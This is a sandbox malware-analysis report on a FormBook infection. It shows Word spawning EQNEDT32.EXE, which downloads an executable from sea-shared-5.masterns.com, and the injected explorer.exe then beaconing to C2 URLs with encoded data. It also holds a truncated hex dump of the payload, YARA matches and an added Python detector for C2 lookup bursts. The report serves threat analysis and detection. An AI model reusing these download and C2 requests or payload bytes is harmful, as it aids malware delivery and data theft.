                                                                                                                                                            Nov 26, 2020 08:44:07.298508883 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298511028 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298512936 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298515081 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298518896 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298535109 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298542023 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298552036 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298567057 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298583031 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298587084 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298599005 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298609972 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298624039 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298631907 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298643112 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298650026 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298674107 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298676968 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298691988 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298701048 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298711061 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298719883 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298737049 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298739910 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298753023 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298755884 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298768997 CET8049167104.168.198.45192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:44:07.298772097 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298784971 CET8049167104.168.198.45192.168.2.22

UDP Packets

Timestamp                            Source Port  Dest Port  Source IP     Dest IP
Nov 26, 2020 08:44:06.484982967 CET  52197        53         192.168.2.22  8.8.8.8
Nov 26, 2020 08:44:06.529192924 CET  53           52197      8.8.8.8       192.168.2.22
Nov 26, 2020 08:45:54.203960896 CET  53099        53         192.168.2.22  8.8.8.8
Nov 26, 2020 08:45:54.245131016 CET  53           53099      8.8.8.8       192.168.2.22
Nov 26, 2020 08:45:59.259130001 CET  52838        53         192.168.2.22  8.8.8.8
Nov 26, 2020 08:45:59.604048014 CET  53           52838      8.8.8.8       192.168.2.22
Nov 26, 2020 08:46:04.984123945 CET  61200        53         192.168.2.22  8.8.8.8
Nov 26, 2020 08:46:05.025748014 CET  53           61200      8.8.8.8       192.168.2.22
Nov 26, 2020 08:46:10.570633888 CET  49548        53         192.168.2.22  8.8.8.8
Nov 26, 2020 08:46:10.610701084 CET  53           49548      8.8.8.8       192.168.2.22
Nov 26, 2020 08:46:29.466934919 CET  55627        53         192.168.2.22  8.8.8.8
Nov 26, 2020 08:46:29.508364916 CET  53           55627      8.8.8.8       192.168.2.22

DNS Queries

Timestamp                            Source IP     Dest IP  Trans ID  OP Code             Name                         Type            Class
Nov 26, 2020 08:44:06.484982967 CET  192.168.2.22  8.8.8.8  0x26d4    Standard query (0)  sea-shared-5.masterns.com    A (IP address)  IN (0x0001)
Nov 26, 2020 08:45:54.203960896 CET  192.168.2.22  8.8.8.8  0xccff    Standard query (0)  www.musmarservices.com       A (IP address)  IN (0x0001)
Nov 26, 2020 08:45:59.259130001 CET  192.168.2.22  8.8.8.8  0x2e78    Standard query (0)  www.opel-occasions-ales.com  A (IP address)  IN (0x0001)
Nov 26, 2020 08:46:04.984123945 CET  192.168.2.22  8.8.8.8  0x2f03    Standard query (0)  www.runwithit.media          A (IP address)  IN (0x0001)
Nov 26, 2020 08:46:10.570633888 CET  192.168.2.22  8.8.8.8  0x3c4e    Standard query (0)  www.mycapecrusade.com        A (IP address)  IN (0x0001)
Nov 26, 2020 08:46:29.466934919 CET  192.168.2.22  8.8.8.8  0x6ec7    Standard query (0)  www.akasyaofistasima.com     A (IP address)  IN (0x0001)

DNS Answers

Timestamp                            Source IP  Dest IP       Trans ID  Reply Code      Name                         CName                   Address          Type                    Class
Nov 26, 2020 08:44:06.529192924 CET  8.8.8.8    192.168.2.22  0x26d4    No error (0)    sea-shared-5.masterns.com    -                       104.168.198.45   A (IP address)          IN (0x0001)
Nov 26, 2020 08:45:54.245131016 CET  8.8.8.8    192.168.2.22  0xccff    Name error (3)  www.musmarservices.com       none                    none             A (IP address)          IN (0x0001)
Nov 26, 2020 08:45:59.604048014 CET  8.8.8.8    192.168.2.22  0x2e78    No error (0)    www.opel-occasions-ales.com  -                       50.117.11.156    A (IP address)          IN (0x0001)
Nov 26, 2020 08:46:05.025748014 CET  8.8.8.8    192.168.2.22  0x2f03    No error (0)    www.runwithit.media          ext-sq.squarespace.com  -                CNAME (Canonical name)  IN (0x0001)
Nov 26, 2020 08:46:05.025748014 CET  8.8.8.8    192.168.2.22  0x2f03    No error (0)    ext-sq.squarespace.com       -                       198.49.23.141    A (IP address)          IN (0x0001)
Nov 26, 2020 08:46:05.025748014 CET  8.8.8.8    192.168.2.22  0x2f03    No error (0)    ext-sq.squarespace.com       -                       198.185.159.141  A (IP address)          IN (0x0001)
Nov 26, 2020 08:46:05.025748014 CET  8.8.8.8    192.168.2.22  0x2f03    No error (0)    ext-sq.squarespace.com       -                       198.49.23.141    A (IP address)          IN (0x0001)
Nov 26, 2020 08:46:05.025748014 CET  8.8.8.8    192.168.2.22  0x2f03    No error (0)    ext-sq.squarespace.com       -                       198.185.159.141  A (IP address)          IN (0x0001)
Nov 26, 2020 08:46:10.610701084 CET  8.8.8.8    192.168.2.22  0x3c4e    No error (0)    www.mycapecrusade.com        mycapecrusade.com       -                CNAME (Canonical name)  IN (0x0001)
Nov 26, 2020 08:46:10.610701084 CET  8.8.8.8    192.168.2.22  0x3c4e    No error (0)    mycapecrusade.com            -                       34.102.136.180   A (IP address)          IN (0x0001)
Nov 26, 2020 08:46:29.508364916 CET  8.8.8.8    192.168.2.22  0x6ec7    No error (0)    www.akasyaofistasima.com     akasyaofistasima.com    -                CNAME (Canonical name)  IN (0x0001)
Nov 26, 2020 08:46:29.508364916 CET  8.8.8.8    192.168.2.22  0x6ec7    No error (0)    akasyaofistasima.com         -                       89.252.180.207   A (IP address)          IN (0x0001)

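The DNS tables above show two distinct phases. At 08:44:06 there is a single lookup of sea-shared-5.masterns.com, the host the downloader stage fetches its executable from. Roughly two minutes later, between 08:45:54 and 08:46:29, five unrelated domains are resolved one after another a few seconds apart, one of them NXDOMAIN and one (www.runwithit.media) a CNAME into Squarespace. That second shape is what FormBook's injected explorer.exe produces when it walks its embedded list of command-and-control candidates. The Python below is an added example, not part of the sandbox report or of its tooling: it takes the answer rows as constructed input, clusters lookups that follow each other closely, and reports a cluster as a candidate C2 walk when it touches several distinct registrable domains. The 30-second gap and the four-domain minimum are assumed thresholds for this example, not values taken from the report.

```python
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Tuple

# Constructed input: the DNS answer rows from the tables above, reduced to
# (timestamp, queried name, reply code, resolved address). CNAME chains are
# folded into their final A record; the NXDOMAIN row carries no address.
DNS_LOG: List[Tuple[str, str, int, Optional[str]]] = [
    ("Nov 26, 2020 08:44:06.529192924 CET", "sea-shared-5.masterns.com", 0, "104.168.198.45"),
    ("Nov 26, 2020 08:45:54.245131016 CET", "www.musmarservices.com", 3, None),
    ("Nov 26, 2020 08:45:59.604048014 CET", "www.opel-occasions-ales.com", 0, "50.117.11.156"),
    ("Nov 26, 2020 08:46:05.025748014 CET", "www.runwithit.media", 0, "198.49.23.141"),
    ("Nov 26, 2020 08:46:10.610701084 CET", "www.mycapecrusade.com", 0, "34.102.136.180"),
    ("Nov 26, 2020 08:46:29.508364916 CET", "www.akasyaofistasima.com", 0, "89.252.180.207"),
]

NXDOMAIN = 3  # DNS RCODE 3, shown as "Name error (3)" in the report


def parse_ts(stamp: str) -> datetime:
    """Sandbox timestamps carry nine fractional digits; strptime's %f takes six."""
    body, _tz = stamp.rsplit(" ", 1)
    head, frac = body.rsplit(".", 1)
    return datetime.strptime(f"{head}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


def registrable(name: str) -> str:
    """Crude eTLD+1 (last two labels). Adequate for these names; use a public
    suffix list in production so co.uk-style suffixes are not miscounted."""
    return ".".join(name.rstrip(".").lower().split(".")[-2:])


def cluster_lookups(log, max_gap: timedelta) -> List[List[tuple]]:
    """Group lookups into bursts: each lookup joins the current burst if it
    follows the previous one within max_gap, otherwise it starts a new one."""
    events = sorted((parse_ts(t), name, rc, addr) for t, name, rc, addr in log)
    if not events:
        return []
    bursts, current = [], [events[0]]
    for ev in events[1:]:
        if ev[0] - current[-1][0] <= max_gap:
            current.append(ev)
        else:
            bursts.append(current)
            current = [ev]
    bursts.append(current)
    return bursts


def find_c2_walks(log, max_gap=timedelta(seconds=30), min_domains=4) -> List[Dict]:
    """Report every burst that touches at least min_domains distinct
    registrable domains as a candidate C2 list walk. Both thresholds are
    assumptions chosen for this example."""
    findings = []
    for burst in cluster_lookups(log, max_gap):
        domains = sorted({registrable(n) for _, n, _, _ in burst})
        if len(domains) < min_domains:
            continue
        findings.append({
            "start": burst[0][0],
            "end": burst[-1][0],
            "domains": domains,
            "nxdomain": [n for _, n, rc, _ in burst if rc == NXDOMAIN],
            "addresses": sorted({a for _, _, _, a in burst if a}),
        })
    return findings


if __name__ == "__main__":
    for walk in find_c2_walks(DNS_LOG):
        span = (walk["end"] - walk["start"]).total_seconds()
        print(f"{len(walk['domains'])} domains in {span:.0f}s: {walk['domains']}")
        print(f"  NXDOMAIN: {walk['nxdomain']}  resolved: {walk['addresses']}")
```

Run against the rows above, the downloader lookup stays in a burst of its own and is not reported, while the five lookups from 08:45:54 to 08:46:29 come out as one walk of about 35 seconds with www.musmarservices.com as the NXDOMAIN entry. The HTTP session table further down ties the walk to a process: session 1 is explorer.exe connecting to 50.117.11.156:80, the address www.opel-occasions-ales.com resolved to. Treat the resolved addresses as leads rather than a blocklist; FormBook pads its candidate list with decoy domains, and the Squarespace CNAME behind www.runwithit.media is a reminder that some of these hosts are ordinary sites.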
HTTP Request Dependency Graph

• sea-shared-5.masterns.com
• www.opel-occasions-ales.com
• www.runwithit.media
• www.mycapecrusade.com

HTTP Packets

Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
0           192.168.2.22  49167        104.168.198.45  80                C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp                            kBytes transferred  Direction  Data
Nov 26, 2020 08:44:06.720232010 CET  0                   OUT        GET /~vhlcnlog/ugopoundx/skypoundx.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: sea-shared-5.masterns.com
Connection: Keep-Alive
Nov 26, 2020 08:44:06.900933027 CET  2                   IN         HTTP/1.1 200 OK
Date: Thu, 26 Nov 2020 07:44:06 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Last-Modified: Thu, 26 Nov 2020 01:10:37 GMT
Accept-Ranges: bytes
Content-Length: 278528
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=10000
Content-Type: application/x-msdownload
                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5c ff be 5f 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 f2 03 00 00 4c 00 00 00 00 00 00 be 10 04 00 00 20 00 00 00 20 04 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 04 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 10 04 00 57 00 00 00 00 20 04 00 38 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 f0 03 00 00 20 00 00 00 f2 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 38 49 00 00 00 20 04 00 00 4a 00 00 00 f4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 04 00 00 02 00 00 00 3e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 10 04 00 00 00 00 00 48 00 00 00 02 00 05 00 6c ed 03 00 f8 22 00 00 03 00 00 00 43 00 00 06 e8 30 00 00 84 bc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 17 1e 2d 08 26 28 
13 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 09 00 1d 00 00 00 00 00 00 00 73 01 00 00 06 28 14 00 00 0a 74 02 00 00 02 1e 2d 03 26 2b 07 80 01 00 00 04 2b 00 2a 00 00 00 1a 7e 01 00 00 04 2a 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 16 1d 2d 08 26 28 15 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 19 1b 2d 08 26 28 15 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 1a 1b 2d 08 26 28 15 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 1e 17 2d 08 26 28 15 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 1d 18 2d 08 26 28 15 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 1e 1a 2d 08 26 28 15 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 18 17 2d 08 26 28 15 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 1c 1e 2d 08 26 28 15 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 17 1d 2d 08 26 28 15 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 1e 16 2c 08 26 28 15 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 1d 17 2d 08 26 28 15 00 00 0a 2b 03 26 2b f6 2a 00 00
                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL\_L @ @dW 8I H.text `.rsrc8I J@@.reloc>@BHl"C00-&(+&+*0s(t-&++*~*0-&(+&+*0-&(+&+*0-&(+&+*0-&(+&+*0-&(+&+*0-&(+&+*0-&(+&+*0-&(+&+*0-&(+&+*0,&(+&+*0-&(+&+*


Session ID: 1
Source IP: 192.168.2.22
Source Port: 49168
Destination IP: 50.117.11.156
Destination Port: 80
Process: C:\Windows\explorer.exe

Timestamp: Nov 26, 2020 08:45:59.790648937 CET
kBytes transferred: 294
Direction: OUT
Data: GET /bu43/?OBZPd=k6AhchXHBB&Yzrx=UiBHsTvAEQLKMdFr/hj1g9PdhtcWl8ZZ/ysXuG6Tr8ng0KhPmhT7mwdkGkewJ6JbNyjYEA== HTTP/1.1
Host: www.opel-occasions-ales.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

Timestamp: Nov 26, 2020 08:45:59.969166994 CET
kBytes transferred: 295
Direction: IN
Data: HTTP/1.1 200 OK
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Server: Nginx Microsoft-HTTPAPI/2.0
X-Powered-By: Nginx
Date: Thu, 26 Nov 2020 07:45:58 GMT
Connection: close
Data Raw: 33 0d 0a ef bb bf 0d 0a
Data Ascii: 3


Session ID: 2
Source IP: 192.168.2.22
Source Port: 49169
Destination IP: 198.49.23.141
Destination Port: 80
Process: C:\Windows\explorer.exe

Timestamp: Nov 26, 2020 08:46:05.157809019 CET
kBytes transferred: 300
Direction: OUT
Data: GET /bu43/?Yzrx=5vpVtqJ3i14TYLjahre3JpaYS6Wcf4IPAkG7pj5paeEEzi6lwzUZWwRsk9qYR19+9CpDRA==&OBZPd=k6AhchXHBB HTTP/1.1
Host: www.runwithit.media
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

Timestamp: Nov 26, 2020 08:46:05.290102005 CET
kBytes transferred: 301
Direction: IN
Data: HTTP/1.1 400 Bad Request
content-length: 77564
expires: Thu, 01 Jan 1970 00:00:00 UTC
pragma: no-cache
cache-control: no-cache, must-revalidate
content-type: text/html; charset=UTF-8
connection: close
date: Thu, 26 Nov 2020 07:46:05 UTC
x-contextid: nUrUpo0O/0htnjK7R
server: Squarespace
                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 
69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20
                                                                                                                                                            Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;


Session ID: 3
Source IP: 192.168.2.22
Source Port: 49170
Destination IP: 34.102.136.180
Destination Port: 80
Process: C:\Windows\explorer.exe

Timestamp: Nov 26, 2020 08:46:10.629771948 CET
kBytes transferred: 381
Direction: OUT
Data: GET /bu43/?OBZPd=k6AhchXHBB&Yzrx=5Lfh6qcZO6QCpL41ah3mk8LUL3OJ/OZx9c26bzra2u0GgF5XtbJN8WKHQCrI7u2LEBkhnA== HTTP/1.1
Host: www.mycapecrusade.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

Timestamp: Nov 26, 2020 08:46:10.744771957 CET
kBytes transferred: 382
Direction: IN
Data: HTTP/1.1 403 Forbidden
Server: openresty
Date: Thu, 26 Nov 2020 07:46:10 GMT
Content-Type: text/html
Content-Length: 275
ETag: "5fb7c734-113"
Via: 1.1 google
Connection: close
                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Code Manipulations

Statistics

Behavior

System Behavior

General

Start time: 08:43:37
Start date: 26/11/2020
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase: 0x13fda0000
File size: 1424032 bytes
MD5 hash: 95C38D04597050285A18F66039EDB456
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 08:43:38
Start date: 26/11/2020
Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase: 0x400000
File size: 543304 bytes
MD5 hash: A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 08:43:40
Start date: 26/11/2020
Path: C:\Users\user\AppData\Roaming\skypound83892.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\skypound83892.exe
Imagebase: 0x90000
File size: 278528 bytes
MD5 hash: EF8FC92D8B47C1F40DD5233AA9B3F260
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
Reputation: low

General

Start time: 08:43:59
Start date: 26/11/2020
Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase: 0x400000
File size: 543304 bytes
MD5 hash: A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 08:44:02
Start date: 26/11/2020
Path: C:\Users\user\AppData\Roaming\skypound83892.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\skypound83892.exe
Imagebase: 0x90000
File size: 278528 bytes
MD5 hash: EF8FC92D8B47C1F40DD5233AA9B3F260
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
